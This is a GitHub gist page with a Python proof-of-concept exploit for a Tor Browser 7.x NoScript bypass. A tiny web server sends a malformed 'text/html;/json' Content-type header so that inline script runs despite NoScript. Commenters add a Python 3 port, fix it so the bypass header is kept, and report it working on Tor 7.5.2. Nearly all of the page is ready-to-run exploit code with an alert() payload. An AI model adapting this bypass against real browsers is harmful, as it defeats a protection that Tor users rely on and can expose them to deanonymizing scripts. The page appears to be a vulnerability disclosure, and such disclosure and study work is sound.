Skip to content

Instantly share code, notes, and snippets.

@x0rz

x0rz/TorBrowser_7.x_NoScript_bypass.py

Last active November 10, 2021 13:24
Show Gist options
  • Star 38 You must be signed in to star a gist
  • Fork 15 You must be signed in to fork a gist
  • Save x0rz/8198e8e22b1f70fddb9c815c1232b795 to your computer and use it in GitHub Desktop.
Save x0rz/8198e8e22b1f70fddb9c815c1232b795 to your computer and use it in GitHub Desktop.
Download ZIP
Tor Browser 7.x NoScript bypass vulnerability https://twitter.com/Zerodium/status/1039127214602641409
Raw
TorBrowser_7.x_NoScript_bypass.py
#!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
PORT_NUMBER = 31337
class myHandler(BaseHTTPRequestHandler):
#Handler for the GET requests
def do_GET(self):
self.send_response(200)
self.send_header('Content-type','text/html;/json') # Here is where the magic happens
self.end_headers()
self.wfile.write("<html>Tor Browser 7.x PoC<script>alert('NoScript bypass')</script></html>")
return
try:
server = HTTPServer(('', PORT_NUMBER), myHandler)
print 'Started httpserver on port ' , PORT_NUMBER
server.serve_forever()
except KeyboardInterrupt:
print '^C received, shutting down the web server'
server.socket.close()
@sparskakyl
Copy link

2 hacky wacky 4 me

@brammittendorff
Copy link

brammittendorff commented Sep 10, 2018
edited

Python3 version:

#!/usr/bin/python
from http.server import BaseHTTPRequestHandler, HTTPServer

PORT_NUMBER = 31337

class myHandler(BaseHTTPRequestHandler):

        #Handler for the GET requests
        def do_GET(self):
                self.send_response(200)
                self.send_header('Content-type','text/html;/json') # Here is where the magic happens
                self.end_headers()
                self.wfile.write("<html>Tor Browser 7.x PoC<script>alert('NoScript bypass')</script></html>".encode())
                return

try:
        server = HTTPServer(('', PORT_NUMBER), myHandler)
        print('Started httpserver on port %s' % PORT_NUMBER)
        server.serve_forever()

except KeyboardInterrupt:
        print('^C received, shutting down the web server')
        server.socket.close()

@jorgeluengar
Copy link

@brammittendorff many thanks in advance for the Python3 version, but there is a small mistake regarding the exploit:
It must use:
self.send_header('Content-type','text/html;/json')
instead of
self.send_header('Content-type','text/html')

Tested on Tor 7.5.2

Thanks!

@brammittendorff
Copy link

@jorgeluengar you are right, fixed my comment thanks!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment